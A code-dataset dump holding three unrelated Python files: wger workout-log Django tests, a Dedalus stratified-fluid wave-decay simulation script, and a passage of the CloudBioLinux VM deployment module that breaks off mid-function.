text stringlengths 12 1.05M | repo_name stringlengths 5 86 | path stringlengths 4 191 | language stringclasses 1 value | license stringclasses 15 values | size int32 12 1.05M | keyword listlengths 1 23 | text_hash stringlengths 64 64 |
|---|---|---|---|---|---|---|---|
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
import datetime
import logging
from django.contrib.auth.models import User
from django.core.cache import cache
from django.core.urlresolvers import reverse, reverse_lazy
from wger.core.tests import api_base_test
from wger.core.tests.base_testcase import WorkoutManagerDeleteTestCase
from wger.core.tests.base_testcase import WorkoutManagerTestCase
from wger.exercises.models import Exercise
from wger.manager.models import Workout
from wger.manager.models import WorkoutLog
from wger.manager.models import WorkoutSession
from wger.utils.cache import cache_mapper
logger = logging.getLogger(__name__)
class WorkoutLogShareButtonTestCase(WorkoutManagerTestCase):
'''
Test that the share button is correctly displayed and hidden
'''
def test_share_button(self):
url = reverse('manager:log:log', kwargs={'pk': 1})
response = self.client.get(url)
self.assertFalse(response.context['show_shariff'])
self.user_login('admin')
response = self.client.get(url)
self.assertTrue(response.context['show_shariff'])
self.user_login('test')
response = self.client.get(url)
self.assertFalse(response.context['show_shariff'])
class WeightLogAccessTestCase(WorkoutManagerTestCase):
'''
Test accessing the weight log page
'''
def test_access_shared(self):
'''
Test accessing the URL of a shared weight log
'''
url = reverse('manager:log:log', kwargs={'pk': 1})
self.user_login('admin')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.user_login('test')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.user_logout()
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_access_not_shared(self):
'''
Test accessing the URL of a private weight log
'''
url = reverse('manager:log:log', kwargs={'pk': 3})
self.user_login('admin')
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.user_login('test')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.user_logout()
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
class CalendarShareButtonTestCase(WorkoutManagerTestCase):
'''
Test that the share button is correctly displayed and hidden
'''
def test_share_button(self):
url = reverse('manager:workout:calendar', kwargs={'username': 'admin'})
response = self.client.get(url)
self.assertFalse(response.context['show_shariff'])
self.user_login('admin')
response = self.client.get(url)
self.assertTrue(response.context['show_shariff'])
self.user_login('test')
response = self.client.get(url)
self.assertFalse(response.context['show_shariff'])
class CalendarAccessTestCase(WorkoutManagerTestCase):
'''
Test accessing the calendar page
'''
def test_access_shared(self):
'''
Test accessing the URL of a shared calendar page
'''
url = reverse('manager:workout:calendar', kwargs={'username': 'admin'})
self.user_login('admin')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.user_login('test')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.user_logout()
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_access_not_shared(self):
'''
Test accessing the URL of a unshared calendar page
'''
url = reverse('manager:workout:calendar', kwargs={'username': 'test'})
self.user_login('admin')
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
self.user_login('test')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.user_logout()
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
class WeightLogOverviewAddTestCase(WorkoutManagerTestCase):
'''
Tests the weight log functionality
'''
def add_weight_log(self, fail=True):
'''
Helper function to test adding weight log entries
'''
# Fetch the overview page
response = self.client.get(reverse('manager:log:log', kwargs={'pk': 1}))
# All access OK, since user 1 has ro_access = True
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['active_tab'], 'workout')
self.assertEqual(response.context['workout'].id, 1)
# Open the log entry page
response = self.client.get(reverse('manager:day:log', kwargs={'pk': 1}))
if fail:
self.assertIn(response.status_code, (302, 403))
else:
self.assertEqual(response.status_code, 200)
# Add new log entries
count_before = WorkoutLog.objects.count()
response = self.client.post(reverse('manager:day:log', kwargs={'pk': 1}),
{'date': '2012-01-01',
'notes': 'My cool impression',
'impression': '3',
'time_start': datetime.time(10, 0),
'time_end': datetime.time(12, 0),
'form-0-reps': 10,
'form-0-repetition_unit': 1,
'form-0-weight': 10,
'form-0-weight_unit': 1,
'form-1-reps': 10,
'form-1-repetition_unit': 1,
'form-1-weight': 10,
'form-1-weight_unit': 1,
'form-TOTAL_FORMS': 3,
'form-INITIAL_FORMS': 0,
'form-MAX-NUM_FORMS': 3
})
count_after = WorkoutLog.objects.count()
# Logged out users get a 302 redirect to login page
# Users not owning the workout, a 403, forbidden
if fail:
self.assertIn(response.status_code, (302, 403))
self.assertEqual(count_before, count_after)
else:
self.assertEqual(response.status_code, 302)
self.assertGreater(count_after, count_before)
def test_add_weight_log_anonymous(self):
'''
Tests adding weight log entries as an anonymous user
'''
self.add_weight_log(fail=True)
def test_add_weight_log_owner(self):
'''
Tests adding weight log entries as the owner user
'''
self.user_login('admin')
self.add_weight_log(fail=False)
def test_add_weight_log_other(self):
'''
Tests adding weight log entries as a logged user not owning the data
'''
self.user_login('test')
self.add_weight_log(fail=True)
class WeightlogTestCase(WorkoutManagerTestCase):
'''
Tests other model methods
'''
def test_get_workout_session(self):
'''
Test the wgerGetWorkoutSession method
'''
user1 = User.objects.get(pk=1)
user2 = User.objects.get(pk=2)
workout1 = Workout.objects.get(pk=2)
workout2 = Workout.objects.get(pk=2)
WorkoutLog.objects.all().delete()
l = WorkoutLog()
l.user = user1
l.date = datetime.date(2014, 1, 5)
l.exercise = Exercise.objects.get(pk=1)
l.workout = workout1
l.weight = 10
l.reps = 10
l.save()
session1 = WorkoutSession()
session1.user = user1
session1.workout = workout1
session1.notes = 'Something here'
session1.impression = '3'
session1.date = datetime.date(2014, 1, 5)
session1.save()
session2 = WorkoutSession()
session2.user = user1
session2.workout = workout1
session2.notes = 'Something else here'
session2.impression = '1'
session2.date = datetime.date(2014, 1, 1)
session2.save()
session3 = WorkoutSession()
session3.user = user2
session3.workout = workout2
session3.notes = 'The notes here'
session3.impression = '2'
session3.date = datetime.date(2014, 1, 5)
session3.save()
self.assertEqual(l.get_workout_session(), session1)
class WeightLogDeleteTestCase(WorkoutManagerDeleteTestCase):
'''
Tests deleting a WorkoutLog
'''
object_class = WorkoutLog
url = reverse_lazy('manager:log:delete', kwargs={'pk': 1})
pk = 1
class WeightLogEntryEditTestCase(WorkoutManagerTestCase):
'''
Tests editing individual weight log entries
'''
def edit_log_entry(self, fail=True):
'''
Helper function to test edit log entries
'''
response = self.client.get(reverse('manager:log:edit', kwargs={'pk': 1}))
if fail:
self.assertTrue(response.status_code in (302, 403))
else:
self.assertEqual(response.status_code, 200)
date_before = WorkoutLog.objects.get(pk=1).date
response = self.client.post(reverse('manager:log:edit', kwargs={'pk': 1}),
{'date': '2012-01-01',
'reps': 10,
'repetition_unit': 2,
'weight_unit': 3,
'weight': 10,
'exercise': 1
})
date_after = WorkoutLog.objects.get(pk=1).date
if fail:
# Logged out users get a 302 redirect to login page
# Users not owning the workout, a 403, forbidden
self.assertTrue(response.status_code in (302, 403))
self.assertEqual(date_before, date_after)
else:
self.assertEqual(response.status_code, 302)
self.assertEqual(date_after, datetime.date(2012, 1, 1))
def test_edit_log_entry_anonymous(self):
'''
Tests editing a weight log entries as an anonymous user
'''
self.edit_log_entry(fail=True)
def test_edit_log_entry_owner(self):
'''
Tests editing a weight log entries as the owner user
'''
self.user_login('admin')
self.edit_log_entry(fail=False)
def test_edit_log_entry_other(self):
'''
Tests editing a weight log entries as a logged user not owning the data
'''
self.user_login('test')
self.edit_log_entry(fail=True)
class WorkoutLogCacheTestCase(WorkoutManagerTestCase):
'''
Workout log cache test case
'''
def test_calendar(self):
'''
Test the log cache is correctly generated on visit
'''
log_hash = hash((1, 2012, 10))
self.user_login('admin')
self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))
def test_calendar_day(self):
'''
Test the log cache on the calendar day view is correctly generated on visit
'''
log_hash = hash((1, 2012, 10, 1))
self.user_login('admin')
self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
'year': 2012,
'month': 10,
'day': 1}))
self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))
def test_calendar_anonymous(self):
'''
Test the log cache is correctly generated on visit by anonymous users
'''
log_hash = hash((1, 2012, 10))
self.user_logout()
self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
self.client.get(reverse('manager:workout:calendar', kwargs={'username': 'admin',
'year': 2012,
'month': 10}))
self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))
def test_calendar_day_anonymous(self):
'''
Test the log cache is correctly generated on visit by anonymous users
'''
log_hash = hash((1, 2012, 10, 1))
self.user_logout()
self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
'year': 2012,
'month': 10,
'day': 1}))
self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))
def test_cache_update_log(self):
'''
Test that the caches are cleared when saving a log
'''
log_hash = hash((1, 2012, 10))
log_hash_day = hash((1, 2012, 10, 1))
self.user_login('admin')
self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
'year': 2012,
'month': 10,
'day': 1}))
log = WorkoutLog.objects.get(pk=1)
log.weight = 35
log.save()
self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash_day)))
def test_cache_update_log_2(self):
'''
Test that the caches are only cleared for a the log's month
'''
log_hash = hash((1, 2012, 10))
log_hash_day = hash((1, 2012, 10, 1))
self.user_login('admin')
self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
'year': 2012,
'month': 10,
'day': 1}))
log = WorkoutLog.objects.get(pk=3)
log.weight = 35
log.save()
self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))
self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash_day)))
def test_cache_delete_log(self):
'''
Test that the caches are cleared when deleting a log
'''
log_hash = hash((1, 2012, 10))
log_hash_day = hash((1, 2012, 10, 1))
self.user_login('admin')
self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
'year': 2012,
'month': 10,
'day': 1}))
log = WorkoutLog.objects.get(pk=1)
log.delete()
self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash_day)))
def test_cache_delete_log_2(self):
'''
Test that the caches are only cleared for a the log's month
'''
log_hash = hash((1, 2012, 10))
log_hash_day = hash((1, 2012, 10, 1))
self.user_login('admin')
self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
'year': 2012,
'month': 10,
'day': 1}))
log = WorkoutLog.objects.get(pk=3)
log.delete()
self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))
self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash_day)))
class WorkoutLogApiTestCase(api_base_test.ApiBaseResourceTestCase):
'''
Tests the workout log overview resource
'''
pk = 5
resource = WorkoutLog
private_resource = True
data = {"exercise": 1,
"workout": 3,
"reps": 3,
"repetition_unit": 1,
"weight_unit": 2,
"weight": 2,
"date": datetime.date.today()}
| kjagoo/wger_stark | wger/manager/tests/test_weight_log.py | Python | agpl-3.0 | 18,455 | [
"VisIt"
] | dafd152e641c6157bed029c6cec171037212975c692a2b1d1f7c394b996d36f5 |
import numpy as np
import h5py
from dedalus import public as de
from dedalus.extras import flow_tools
import time
import argparse
import dedalus_plots as dp
import taufit
import matplotlib.pyplot as plt
def forcing(solver):
# if using dealiasing, it's important to apply the forcing on the dealiased doman (xd,zd)
if solver.sim_time < pulse_len:
#f = 0.001*np.sin(np.pi*zd/Lz)*np.exp(-16.*(xd*xd)/((lambda_x)**2)) #pulse with "effective wavelength" lambda_x
f = 0.001*np.sin(m * np.pi*zd/Lz)*np.cos(2. * k* np.pi* xd /Lx) # cosine wave
strat = np.where(zd>Lz)
f[:,strat] = 0.
f = 0.
else:
f = 0.
return f
parser = argparse.ArgumentParser(description='simulate a Boussinesq pulse')
parser.add_argument('k', metavar = 'k', type = int, help='forcing wavenumber in the horizontal')
parser.add_argument('m', metavar = 'm', type = int, help='forcing wavenumber in the vertical')
parser.add_argument('eps', metavar = 'eps', type = float, help='epsilon, the ratio of buoyancy frequency in troposphere and stratosphere')
parser.add_argument('-nh','--non-hstat', dest='hstat', action='store_false')
parser.add_argument('-p','--pulse', dest='pulse', action='store_true')
parser.add_argument('-pl', '--pulse-len', dest = 'pulse_len' , type = float)
parser.set_defaults(pulse_len=100)
parser.set_defaults(hstat=True)
parser.set_defaults(pulse=False)
args = parser.parse_args()
PULSE = args.pulse
HYDROSTATIC = args.hstat
#print('pulse_len is ', args.pulse_len)
if HYDROSTATIC == True:
print('using hydrostatic boussinesq solver')
else:
print('using non-hydrostatic boussinesq solver')
if PULSE == True:
print('solving for gaussian forcing')
else:
print('solving for cosine forcing (single k)')
import logging
root = logging.root
for h in root.handlers:
h.setLevel("INFO")
logger = logging.getLogger(__name__)
Lx, Lz = (3000000, 10000) # domain size in meters
nx, nz = (144, 300) # number of points in each direction
#Lx, Lz = (4000000, 10000) # domain size in meters
#nx, nz = (4*64, 144) # number of points in each direction
# parameters (some of these should be set via command line args)
stop_time = 20000. # simulation stop time (seconds)
pulse_len = args.pulse_len # seconds of forcing
N1 = 0.01 # buoyancy frequency in the troposphere (1/s)
# Create bases and domain
x_basis = de.Fourier('x', nx, interval=(-Lx/2., Lx/2.))
# compound z basis -- better to resolve jump condition?
#zb1 = de.Chebyshev('z1',int(nz/4), interval=(0, Lz+1000), dealias=3/2)
#zb2 = de.Chebyshev('z2', nz, interval=(Lz+1000,model_top), dealias = 3/2)
#z_basis = de.Compound('z',(zb1,zb2), dealias = 3/2)
#
eps = args.eps # ratio of N1/N2
N2 = N1/eps # buoyancy frequency in the stratosphere
model_top = 16. * Lz # lid height
if eps < 0.41:
model_top = 6. * Lz # increases resolution near the jump
z_basis = de.Chebyshev('z', nz, interval= (0, model_top))
domain = de.Domain([x_basis, z_basis], grid_dtype=np.float64)
x, z = domain.grids(scales=1)
xd, zd = domain.grids(scales=domain.dealias)
# set up problem
problem = de.IVP(domain, variables=['p','u','B','w'])
problem.parameters['rho'] = 1. #kg/m^3
#problem.parameters['Nsq'] = 0.0001 #1/s; constant Nsq
# non-constant coefficient N^2
ncc = domain.new_field(name='Nsq')
ncc['g'] = N1**2
strat = np.where( z > Lz)
ncc['g'][:,strat] = N2**2
ncc.meta['x']['constant'] = True
problem.parameters['Nsq'] = ncc
# mask (for analysis)
mask = domain.new_field(name = 'mask')
mask['g'] = 1
mask['g'][:,strat] = 0
mask.meta['x']['constant'] = True
problem.parameters['mask'] = mask
#define general forcing function
forcing_func = de.operators.GeneralFunction(domain,'g',forcing, args=[])
forcing_func.build_metadata()
#forcing_func.meta = ncc.meta # just tricking it for now, this metadata is wrong
# let's make a general parameter and use that metadata instead
dummy = domain.new_field(name='dum')
dummy['g'] = 1.
forcing_func.meta = dummy.meta
problem.parameters['forcing_func'] = forcing_func
# need to add 'meta' attribute for General Function class
# otherwise system fails consistency check
# system to solve (2D, linearized, hydrostatic boussinesq)
problem.add_equation("dt(u) + 1/rho*dx(p) = 0")
problem.add_equation("dt(B) + Nsq*w = forcing_func")
#problem.add_equation("dt(B) + Nsq*w = 0")
problem.add_equation("dx(u) + dz(w) = 0")
if HYDROSTATIC == True:
problem.add_equation("B - 1/rho*dz(p) = 0")
else:
problem.add_equation("B - 1/rho*dz(p) - dt(w) = 0")
# fourier direction has periodic bc, chebyshev has a lid
problem.add_bc("left(w) = 0") # refers to the first end point in chebyshev direction
problem.add_bc("right(w) = 0", condition="(nx != 0)") # rigid lid, condition note for k = 0 mode
problem.add_bc("integ(p,'z') = 0", condition="(nx == 0)") # pressure gauge condition for k = 0
# build solver
ts = de.timesteppers.RK443 # arbitrary choice of time stepper
#solver = problem.build_solver(ts)
# initial conditions
#x, z = domain.grids(scales=1)
#u = solver.state['u']
#w = solver.state['w']
#p = solver.state['p']
#B = solver.state['B'] # zero for everything
#solver.stop_sim_time = stop_time
#solver.stop_wall_time = np.inf
#solver.stop_iteration = np.inf
# CFL conditions
#initial_dt = 0.8*Lz/nz
#cfl = flow_tools.CFL(solver,initial_dt,safety=0.8, max_change=1.5, min_change=0.5, max_dt=400)
# too large of a timestep makes things rather diffusive
#cfl.add_velocities(('u','w'))
archive_list = []
for k in range(3,10):
m = args.m # vertical mode number
#k = args.k # horizontal mode number
sim_name = 'k'+ str(k) +'m' + str(m)
print('simulation name is', sim_name)
print('effective forcing horizontal wavelength is' , Lx/k/1000., 'kilometers')
print('effective forcing vertical wavelength is' , 2.*Lz/m/1000., 'kilometers')
print('stratification ratio N1/N2 is' , N1/N2 )
# initial conditions
solver = problem.build_solver(ts)
# tell the forcing function what its arg is (clunky)
forcing_func.args = [solver]
forcing_func.original_args = [solver]
x, z = domain.grids(scales=1)
u = solver.state['u']
w = solver.state['w']
p = solver.state['p']
B = solver.state['B'] # zero for everything
u['g'] = 0.
w['g'] = 0.
p['g'] = 0.
B['g'] = 0.
tau_approx = Lx*np.pi*m**2/(2.*Lz*eps*N1*k*2.)
tau_exact = tau_approx + eps * (Lx/Lz) * (2. * (m*np.pi)**2 - 3.)/(12. * N1 * k * np.pi * 2.)
solver.stop_sim_time =0.5*tau_exact
solver.stop_wall_time = np.inf
solver.stop_iteration = np.inf
B['g'] = 0.01*np.sin(m * np.pi*z/Lz)*np.cos(k* 2* np.pi* x /Lx)
B['g'][:,strat] = 0.
# CFL conditions
initial_dt = 0.8*Lz/nz
cfl = flow_tools.CFL(solver,initial_dt,safety=0.8, max_change=5., min_change=0.5, max_dt=300)
# too large of a timestep makes things rather diffusive
cfl.add_velocities(('u','w'))
# fields to record
analysis = solver.evaluator.add_file_handler(sim_name, sim_dt=10, max_writes=2000)
analysis.add_task('B', name = 'buoyancy' )
# 1d fields
analysis.add_task('mask')
##analysis.add_task("integ(B * mask)", name = 'tropo b')
analysis.add_task("integ(0.5 * mask *(u*u + w*w + B*B/Nsq ))", name = 'tropo energy') # use mask to integrate over troposphere only
#analysis.add_task("integ(0.5 * (u*u + w*w + B*B/Nsq ))", name='total e')
try:
logger.info('Starting loop')
start_time = time.time()
while solver.ok:
dt = cfl.compute_dt()
solver.step(dt)
if solver.iteration % 20 == 0:
print('Completed iteration {}'.format(solver.iteration))
print('simulation time {}'.format(solver.sim_time))
except:
logger.error('Exception raised, triggering end of main loop.')
raise
finally:
end_time = time.time()
# Print statistics
logger.info('Run time: %f' %(end_time-start_time))
logger.info('Iterations: %i' %solver.iteration)
# archive decay timescales
filepath = sim_name + "/" + sim_name + "_s1/" + sim_name + "_s1_p0.h5"
print(filepath)
# open data file
data = h5py.File(filepath, "r")
# read in variables and dimensions
dict_vars = {'tropenergy':'tropo energy', 'b3d':'buoyancy'}
vars = dp.read_vars(data, dict_vars)
dims = dp.read_dims(data)
data.close()
energ_normed = vars['tropenergy'][:,0,0]/np.max(vars['tropenergy'][:,0,0])
taufit.taufit(energ_normed,dims, m, k, eps, Lx, Lz, archive_list)
#tau_approx = Lx*np.pi*m**2/(2.*Lz*eps*N1*k*2.)
#tau_exact = tau_approx + eps * (Lx/Lz) * (2. * (m*np.pi)**2 - 3.)/(12. * N1 * k * np.pi * 2.)
#tau_off = Lx*(6 + np.pi**2*m**2*(1.+3.*eps**2))/(6.*eps*N1*k*np.p
energ_normed = vars['tropenergy'][:,0,0]/np.max(vars['tropenergy'][:,0,0])
energ_theory = np.exp(-(dims['t'] - pulse_len )/tau_exact)
energ_approx = np.exp(-(dims['t'] - pulse_len )/tau_approx)
#energ_off = np.exp(-(dims['t'] - pulse_len)/tau_off)
dp.make_1D_plot(sim_name+'/energytest.pdf', dims['t'], simulation = energ_normed,
theory = energ_theory, approx = energ_approx)
dp.make_2D_plot(sim_name+'/binit.pdf', (dims['x']/1000., dims['z']/1000.),vars['b3d'][1,:,:].T , title='b initial', xlabel = 'x (km)', ylabel = 'z (km)')
plt.clf()
plt.plot(dims['t'], np.log(energ_normed))
plt.plot(dims['t'], -1./tau_exact*dims['t'], label = 'theory')
plt.legend()
plt.savefig(sim_name + '/regresstest.pdf')
plt.clf()
taufit.plot_taus(archive_list)
import pickle
outfile = open( "eps02_m2.p", "wb" )
pickle.dump(archive_list, outfile)
#dp.make_1D_plot(sim_name+'/energytest.pdf', dims['t'], simulation = energ_normed,
# theory = energ_theory, offmode = energ_off)
#dp.make_2D_plot(sim_name+'/bend.pdf', (dims['x']/1000., dims['z']/1000.),vars['b3d'][-1,:,:].T , title='b final', xlabel = 'x (km)', ylabel = 'z (km)')i
| jedman/dedalus-leakylid | dedalus_tausim.py | Python | gpl-2.0 | 10,007 | [
"Gaussian"
] | c34b605d0b436b207c37e6d04c071762b876cb2b26989436345383222d7e7b10 |
#!/usr/bin/env python
import os
from tempfile import tempdir
from subprocess import call
from inspect import getargspec
from cloudbio.utils import _setup_logging, _configure_fabric_environment, _parse_fabricrc
from cloudbio.biodata.genomes import install_data, install_data_s3, install_data_rsync
from cloudbio.galaxy import _setup_galaxy_env_defaults
from cloudbio.galaxy.utils import _chown_galaxy
from cloudbio.galaxy.tools import _install_tools
from fabfile import _perform_install, _install_custom
from .util import eval_template
from .volume import attach_volumes, make_snapshots, detach_volumes
import cloudbio.deploy.plugins
from fabric.main import load_settings
from fabric.api import put, run, env, settings, sudo
try:
from .vmlauncher.transfer import FileTransferManager
from .vmlauncher import build_vm_launcher
except ImportError:
build_vm_launcher = None
FileTransferManager = None
DEFAULT_CLOUDBIOLINUX_TARGET = None
DEFAULT_CLOUDBIOLINUX_FLAVOR = None
def deploy(options):
_setup_logging(env)
actions = _expand_actions(options.get("actions"))
if options["vm_provider"] == "novm":
vm_launcher = LocalVmLauncher(options)
else:
if not build_vm_launcher:
raise ImportError("Require vmlauncher: https://github.com/jmchilton/vm-launcher")
vm_launcher = build_vm_launcher(options)
if _do_perform_action("list", actions):
for node in vm_launcher.list():
print "Active node with uuid %s <%s>" % (node.uuid, node)
if _do_perform_action("destroy", actions):
target_name = options["hostname"]
for node in vm_launcher.list():
node_name = node.name
if node_name == target_name:
vm_launcher.destroy(node)
__invoke_plugin_actions(env, actions, "local_actions", [vm_launcher, options])
# Do we have remaining actions requiring an vm?
if len(actions) > 0:
print 'Setting up virtual machine'
vm_launcher.boot_and_connect()
_setup_vm(options, vm_launcher, actions)
class LocalVmLauncher:
"""Provide a lightweight real machine, non-vm class for launching.
"""
def __init__(self, options):
self.options = options
def get_ip(self):
specified_hostname = self.options.get("hostname", None)
hostname = specified_hostname or "localhost"
return hostname
def get_key_file(self):
return None
def boot_and_connect(self):
pass
def destroy(self):
pass
def get_user(self):
return env.user
def list(self):
return []
def _setup_vm(options, vm_launcher, actions):
destroy_on_complete = get_boolean_option(options, 'destroy_on_complete', False)
try:
ip = vm_launcher.get_ip()
_setup_fabric(vm_launcher, ip, options)
with settings(host_string=ip):
_setup_cloudbiolinux(options)
if 'attach_volumes' in actions:
attach_volumes(vm_launcher, options)
if 'max_lifetime' in options:
seconds = options['max_lifetime']
# Unclear why the sleep is needed, but seems to be otherwise
# this doesn't work.
run("bash -c 'nohup sudo shutdown -h %d &'; sleep 2" % seconds)
configure_instance(options, actions)
if 'transfer' in actions:
transfer_files(options)
__invoke_plugin_actions(env, actions, "ready_actions", [vm_launcher, options])
if 'ssh' in actions:
_interactive_ssh(vm_launcher)
if 'attach_ip' in actions:
vm_launcher.attach_public_ip()
if 'snapshot_volumes' in actions:
make_snapshots(vm_launcher, options)
if 'detach_volumes' in actions:
detach_volumes(vm_launcher, options)
if 'package' in actions:
name_template = vm_launcher.package_image_name()
name = eval_template(env, name_template)
vm_launcher.package(name=name)
if not destroy_on_complete and hasattr(vm_launcher, "uuid"):
print 'Your instance (%s) is waiting at http://%s' % (vm_launcher.uuid, ip)
finally:
if destroy_on_complete:
vm_launcher.destroy()
def _expand_actions(actions):
unique_actions = set()
for simple_action in _possible_actions():
if simple_action in actions:
unique_actions.add(simple_action)
compound_actions = __get_plugin_actions(env, "compound_actions")
for compound_action in compound_actions.keys():
if compound_action in actions:
for compound_action_part in compound_actions[compound_action]:
unique_actions.add(compound_action_part)
return unique_actions
def _possible_actions():
possible_actions = [ "list",
"destroy",
"transfer",
"purge_tools",
"setup_tools",
"setup_biodata",
"setup_ssh_key",
"package",
"setup_image",
"launch", # Dummy action justs launches image
"install_biolinux",
"install_custom",
"ssh",
"attach_ip",
"snapshot_volumes",
"attach_volumes",
"detach_volumes",
]
for action_type in ["local_actions", "configure_actions", "ready_action"]:
for action in __get_plugin_actions(env, action_type):
possible_actions.append(action)
return possible_actions
def _do_perform_action(action, action_list):
do_perform = action in action_list
if do_perform:
action_list.remove(action)
return do_perform
def _setup_fabric(vm_launcher, ip, options):
env.user = vm_launcher.get_user()
env.hosts = [ip]
env.key_filename = vm_launcher.get_key_file()
env.disable_known_hosts = True
def _setup_cloudbiolinux(options):
def fabricrc_loader(env):
_setup_cloudbiolinux_fabric_properties(env, options)
flavor = get_main_options_string(options, "flavor", DEFAULT_CLOUDBIOLINUX_FLAVOR)
_configure_fabric_environment(env, flavor, fabricrc_loader=fabricrc_loader)
_setup_image_user_data(env, options)
def _setup_cloudbiolinux_fabric_properties(env, options):
fabricrc_file = get_main_options_string(options, "fabricrc_file", None)
env.config_dir = os.path.join(os.path.dirname(__file__), "..", "..", "config")
env.tool_data_table_conf_file = os.path.join(env.config_dir, "..",
"installed_files",
"tool_data_table_conf.xml")
if fabricrc_file:
env.update(load_settings(fabricrc_file))
else:
# Let cloudbiolinux find out default file based on flavor, dist, etc...
_parse_fabricrc(env)
overrides = options.get("fabricrc_overrides", {})
for key, value in overrides.iteritems():
# yaml parses bools, wouldn't be expected coming out of a fabricrc
# file so replace everything with a string.
if isinstance(value, bool):
overrides[key] = str(value)
env.update(overrides)
_setup_galaxy_env_defaults(env)
def _setup_image_user_data(env, options):
if "image_user_data" in options:
env["image_user_data_dict"] = options["image_user_data"]
def purge_genomes():
sudo("rm -rf %s" % env.data_files)
def configure_ssh_key(options):
if "galaxy_ssh_key" in options:
key_file = options["galaxy_ssh_key"]
sudo("mkdir -p /home/%s/.ssh" % (env.galaxy_user))
sudo("chmod 700 /home/%s/.ssh" % (env.galaxy_user))
put(local_path=key_file,
remote_path="/home/%s/.ssh/%s" % (env.galaxy_user, os.path.basename(key_file)),
use_sudo=True,
mode=0600)
_chown_galaxy(env, "/home/%s/.ssh" % env.galaxy_user)
def setup_biodata(options):
install_proc = install_data
genome_source = options.get("genome_source", "default")
install_proc = {
"default": install_data,
"S3": install_data_s3,
"rsync": install_data_rsync,
}[genome_source]
if genome_source == "default":
install_proc(options["genomes"], ["ggd", "s3", "raw"])
else:
install_proc(options["genomes"])
def configure_instance(options, actions):
if "install_biolinux" in actions:
install_biolinux(options)
if "install_custom" in actions:
install_custom(options)
if "purge_tools" in actions:
purge_tools()
__invoke_plugin_actions(env, actions, "configure_actions", [options])
if "setup_tools" in actions:
install_tools(options["tools"])
if "setup_biodata" in actions:
setup_biodata(options)
if "setup_ssh_key" in actions:
configure_ssh_key(options)
def install_custom(options):
package = options.get("package")
_install_custom(package)
def install_biolinux(options):
flavor = options.get("flavor", DEFAULT_CLOUDBIOLINUX_FLAVOR)
target = options.get("target", DEFAULT_CLOUDBIOLINUX_TARGET)
_perform_install(target=target, flavor=flavor, more_custom_add=options.get("custom_add", None))
def _interactive_ssh(vm_launcher):
""" Launch an interactive SSH session to host described by vm_launcher object.
"""
host = vm_launcher.get_ip()
user = vm_launcher.get_user()
key_file = vm_launcher.get_key_file()
cmd = "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i '%s' -l '%s' '%s'" % (key_file, user, host)
call(cmd, shell=True)
def transfer_files(options):
transfer_options = _build_transfer_options(options, "/mnt/uploaded_data", "galaxy")
_do_transfer(transfer_options, options.get("files", []), options.get("compressed_files", []))
def _build_transfer_options(options, destination, user):
transfer_options = {}
transfer_options['compress'] = get_boolean_option(options, 'compress_transfers', True)
transfer_options['num_compress_threads'] = int(get_main_options_string(options, 'num_compress_threads', '1'))
transfer_options['num_transfer_threads'] = int(get_main_options_string(options, 'num_transfer_threads', '1'))
transfer_options['num_decompress_threads'] = int(get_main_options_string(options, 'num_decompress_threads', '1'))
transfer_options['chunk_size'] = int(get_main_options_string(options, 'transfer_chunk_size', '0'))
transfer_options['transfer_retries'] = int(get_main_options_string(options, 'transfer_retries', '3'))
transfer_options['local_temp'] = get_main_options_string(options, 'local_temp_dir', tempdir)
transfer_options['destination'] = destination
transfer_options['transfer_as'] = user
return transfer_options
def _do_transfer(transfer_options, files, compressed_files=[]):
if not FileTransferManager:
